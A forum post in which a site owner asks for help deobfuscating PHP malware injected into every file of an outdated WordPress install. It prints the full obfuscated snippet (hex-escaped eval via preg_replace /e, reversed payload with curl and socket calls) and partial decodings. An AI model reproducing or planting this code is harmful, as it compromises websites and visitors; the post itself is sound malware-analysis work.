A few days ago, I stumbled upon something weird in a wordpress site : all the .php files (conf, plugins, themes, etc) were prepended with a heavily obfuscated php snippet.
Honestly I don't really care how it got there in the first place, the wordpress site was outdated, so were its plugins, so I guess one of them had a vulnerability. However, I figured it would be quite interesting to check what is was doing, so I tried to deobfuscate it.
Disclaimer : I coded using php for the last time ten years ago, and have been pretty much uninterested with this language since then. So bear with me if this is all standard stuff
Here is the original snippet :
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $pdwpfcjohw = 'w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{825:-t%x5c%x7825)3of:opjudovg<~%x578256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x782bfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5cr(ord($n)-1);} @error_reporting(0); pre]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fec%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x6<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5cx5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78x7827k:!ftmf!}Z;^nbsbq%x5c%x787]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83472%x5c%x7824<!%x5c%x7825mm!>!#]y81]2<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%141%x72%164") && (!isset($GLOBA#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{sut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyf7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%xx7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCc%x7825<#372]58y]472]37y]672]48y]#>825V<*#fopoV;hojepdoF.uofuopD#)sfec%x782f!#0#)idubn%x5c%x7860hfsq)!spd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<*)) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chT7-UFOJ%x5c%x7860GB)fu7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%A)qj3hopmA%x5c%x78273qj%x5c%x74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y3827rfs%x5c%x78256~6<%x5c%x787fw6<*7825mm)%x5c%x7825%x5c%x7878:!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpu{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825if((function_exists("%x6f%142%x5f%163%x74LS["%x61%156%x75%156%x61"]))**X)ufttj%x5c%x7822)gj!|!*!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!w6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tu}#-!tussfw)%x5c%x7825c*W%x5c%x7825**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5w6Z6<.5%x5c%x7860hA%x5c%x782725)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fm3q%x5c%x7825}U;y]}R;2]},;osv-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuf]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]46x7825!>!2p%x5c%x7825!*x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x6-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubEc%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbutc%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7R%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-Sc%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2%166%x61%154%x28%151%x6d6g]273]y76]271]y7d]252]yw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x56]y81]265]y72]254]y]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y7425%x5c%x785cSFWSFT%x5c%x7860%x5c%x78%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sx5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpgx7825:>:r%x5c%x7825:|:**t%x5c%x78)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1tww**WYsboepn)%x5c%x7825bss-%x5c%x7ppde#)tutjyf%x5c%x78604%x5c%x78223x782fh%x5c%x7825:<**#57]38y]47]67ydovg!|!**#j{hnpd#)tutjyf%x5c%x7860785c1^-%x5c%x7825r%x5c%x785c2^-%x573]y76]258]y6g]273]y76]271]y7d]252]y74]2561L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%xz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmo!%x5c%x7825bss%x5c%x785csboe)82f#M5]DgP5]D6#<%x5c%x7825fdy>#]x7825b:<!%x5c%x7825c:>%x5c%x7825s:%u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7875:<#64y]552]e7y]#>n%x59%164%50%x22%134%x78%62%x35%165%x3a%146%x21%7q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x78N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x783>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827p985-rr.93e:5597f-s.973:8297f:2400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-rc%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fpd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5827pd%x5c%x78256<pd%x5c%76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>s:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]V,6<*)ujojR%x5c%x7827id%x5c%x7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256fmy%x5c%x7825)utjm!|!*5!%%x782272qj%x5c%x7825)7gj6<822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bdde>u%x5c%x7825V<#65,47R2;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7bfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tc%x7878pmpusut!-#j0#!%x5c%x824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x7]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x78x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uft2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQf<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)pp)1%x5c%x782f35.)1%x5c%x782f14+9**-)%x5c%x7824!>!fyqmpefpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%xx5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<24-%x5c%x7824*<!%x5c%x7824-%x5c%x7824g%x5c%x7827Y%x5c%x7825GFS%x5c%x7860QUUI&c_UOFHB%x5c%x2f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x78#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%782f!**#sfmcnbs+yfeobuhofm%x5c%x7825:-5ppde:4:|:**#<!%x5c%x7825t::!>!%x5c%x7c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%57-K)fujs%x5c%x7878X6<#o%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npfr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]87827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSF#-#Y#-#D#-#W#-#C#-#O#-#*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787f%x5c%x7825)}.;%x5c%x7860UQPMSVD!K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7825c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x786>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825zji%x5c%x7878:<##:>:h%x5c%x782t%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gv]o]Y%x5c%x78257;utpI#7>%x5c%x782g_replace("%x2f%50%x2e%52%x29%57%x65","%x65,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x785,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#]#>m%x5c%x7825:|:*r%x5c%x7x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%8%x5c%x7824-%x5c%x7824]26%x5c0439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:ix5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5hpph#)zbssb!-#}#)fepmqnj!%x5eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5cpdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%%x5c%x7824-%x5c%x782h%x5c%x7825)j{hnpd!opjububE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]24525nfd>%x5c%x7825fdy<Cb*%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x66~6<&w6<%x5c%x787fw67860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c4]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvs56<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f77827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x7829]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3fofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x57825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%8256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{6d%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7#6#)tutjyf%x5c%x786kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7]37]88y]27]28y]#%x5c%x782**2qj%x5c%x7825)hopm3qj%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48ytj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825FGTOBSUOSVUFS,6<*msv%x5c%x78257-MS#-%x5c%x7825tmw)%x5c%x7825x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5%x7825,3,j%x5c%x7825>j%x5825!*##>>X)!gjZ<#opo#>b%x5c%x7825!]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]2824Ypp3)%x5c%x7825cB%x5c%x7825iNutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;2]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }ps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825c%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}24-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x765]D8]86]y31]278]y3f]55c}X%x5c%x7824<!%x5c%x7825tzw>!#2)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDP4*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x5c%x7825)s%x5c%x7825>%x5c%opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#ufs}%x5c%x7827;mnui}&;zepc}A;~!825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74%x7824-%x5c%x7824<%x5c%x7825j,25}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xx78b%x5c%x7825ggg!>!#]y81]273]y76]258]y%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%xboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%5297e:56-%x5c%x7878r.985:52985-t.98]K4])#%x5c%x7824*<!%x5c%x78251%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c7824y4%x5c%x7824-%x5c%x7824]y/(.*)/epreg_replaceqfbyqgiljb'; $idkmtooiel = explode(chr((154-110)),'1748,41,781,32,1789,28,1309,69,195,39,6550,43,2697,24,8503,68,2259,57,3617,45,8051,43,234,35,6896,47,2033,29,4312,60,5776,47,4372,24,4117,60,8246,63,1400,47,5353,59,7826,60,5862,24,6518,32,3850,63,1582,34,6243,53,9411,45,1378,22,144,51,4653,26,8480,23,1490,29,92,52,7767,59,4576,52,5115,68,8638,42,5565,21,498,54,9526,42,429,69,6045,56,8838,45,986,55,2580,59,8680,34,4546,30,8196,50,7484,21,6175,36,1893,61,8094,56,392,37,6211,32,2133,42,6475,43,9251,39,0,58,4770,45,2362,52,1683,65,1843,50,269,57,8786,52,7986,65,8947,25,2483,62,4628,25,5057,58,7218,61,813,57,7195,23,3224,34,9596,54,5663,37,2237,22,4001,55,4679,67,5886,51,1259,50,1988,45,4253,59,6337,55,8883,64,4852,27,5700,21,3423,38,7037,28,1224,35,1644,39,870,60,5183,67,6101,51,5586,31,7505,39,8392,63,8972,34,1817,26,326,66,7132,43,592,30,2866,36,9773,39,7544,62,1041,46,6296,41,4457,37,8309,20,6839,57,5721,30,3156,34,3785,65,2414,69,5473,54,3558,37,5250,48,4746,24,6658,56,4056,61,1190,34,4815,37,9108,41,2105,28,9650,31,6994,43,2639,58,3662,63,5617,46,9379,32,2806,60,9006,70,2786,20,4396,61,3913,28,3941,60,4206,47,9568,28,3190,34,8455,25,5937,57,3023,33,2062,43,6446,29,3595,22,1155,35,8571,67,6714,26,58,34,6943,51,681,37,3292,42,5823,39,552,40,9290,67,7671,46,2545,35,4879,52,7426,58,10077,29,6810,29,9743,30,6593,65,5527,38,9205,46,7175,20,9456,70,5333,20,10007,25,8329,63,5751,25,9076,32,1954,34,7065,67,2902,68,9899,69,1087,68,2745,41,3258,34,930,56,8714,26,3121,35,9681,62,4177,29,9968,39,9357,22,3334,40,4494,52,4931,62,3491,32,1447,43,7279,69,4993,64,7348,23,3374,49,8150,46,8740,46,622,59,2175,62,7717,50,3461,30,5298,35,10032,45,7371,55,2970,53,3056,65,718,63,3523,35,6740,70,5412,61,6392,54,7606,65,9851,48,1616,28,2316,46,7950,36,6152,23,3725,60,9812,39,2721,24,1519,63,7886,64,5994,51,9149,56'); $phikeisjmv=substr($pdwpfcjohw,(70252-60146),(37-30)); if (!function_exists('jzdiphfmiu')) { function jzdiphfmiu($vkqnkrobcb, $iokxjmjsnh) { $mwknqctosj = NULL; for($iltibddrih=0;$iltibddrih<(sizeof($vkqnkrobcb)/2);$iltibddrih++) { $mwknqctosj .= substr($iokxjmjsnh, $vkqnkrobcb[($iltibddrih*2)],$vkqnkrobcb[($iltibddrih*2)+1]); } return $mwknqctosj; };} $thecjqzgwu="\x20\57\x2a\40\x69\150\x72\165\x74\171\x6e\150\x66\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\65\x37\55\x31\62\x30\51\x29\54\x20\143\x68\162\x28\50\x35\71\x33\55\x35\60\x31\51\x29\54\x20\152\x7a\144\x69\160\x68\146\x6d\151\x75\50\x24\151\x64\153\x6d\164\x6f\157\x69\145\x6c\54\x24\160\x64\167\x70\146\x63\152\x6f\150\x77\51\x29\51\x3b\40\x2f\52\x20\160\x6f\160\x65\167\x6a\144\x63\145\x74\40\x2a\57\x20"; $xayhlwoeym=substr($pdwpfcjohw,(58620-48507),(74-62)); $xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL); $xayhlwoeym=$thecjqzgwu; $xayhlwoeym=(379-258); $pdwpfcjohw=$xayhlwoeym-1; ?>
The first thing I did was to decode hex and octal characters.
First there are some user agent checks, a data string, an array, and a function definition.
<?php
if (!isset($GLOBALS["anuna"])) {
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11")))
$GLOBALS["anuna"] = 1;
}
$pdwpfcjohw = '.....REDACTED.....';
$idkmtooiel = explode(',', .....REDACTED.....);
function jzdiphfmiu($array, $string) {
$result = NULL;
for ($i = 0; $i < (sizeof($array) / 2); $i++) {
$result .= substr($string, $array[($i * 2)], $array[($i * 2) + 1]);
}
return $result;
}
?>
Then the interesting part boils down to a hidden eval with the /e flag in preg_replace :
<?php
$phikeisjmv = "/(.*)/e";
$thecjqzgwu = " /* ihrutynhfv */ eval(str_replace('%', '\\', jzdiphfmiu($idkmtooiel,$pdwpfcjohw))); /* popewjdcet */ ";
$xayhlwoeym = "preg_replace";
$xayhlwoeym($phikeisjmv, $thecjqzgwu, NULL);
?>
I echoed what was passed to eval() after the replacements functions took place, and got another function definition and another hex / octal obfuscated preg_replace :
<?php
function fjfgg($n) {
return chr(ord($n) - 1);
}
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split(".....REDACTED.....
?>
This is where things get really interesting, but really complicated.
What I got after echoing the data passed in and decoding it is :
<?php
$t9e = '$w9 ="/(.*)/e"; $v9 = #5656}5.6%5{6))000016,J(daerW&t$(6elihw5.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5= |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}}i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi }i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W# "eval(str_replace(array" "str_replace";$slv = "strrev";$s1v="create_function" #//}9.g$9;))"46\27x\36.x\26?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261'x\361\26x.1\37x\"=r$;"351\36xa\07x\"=p$;"651.x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}# #1067|416|779|223|361# "preg_replace" array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#)0;$i
?>
It looks like most of this string can be read in reverse (as hinted by strrev anyway) and some characters are replaced using rand functions.
We can easily see very interesting strings, headers, curl, .. Looks like a remote access / shell drop.
However I'm a bit stuck at this point, this code is beyond my php skills to fully reverse engineer.
Do you have any pointers to help me finish this ?
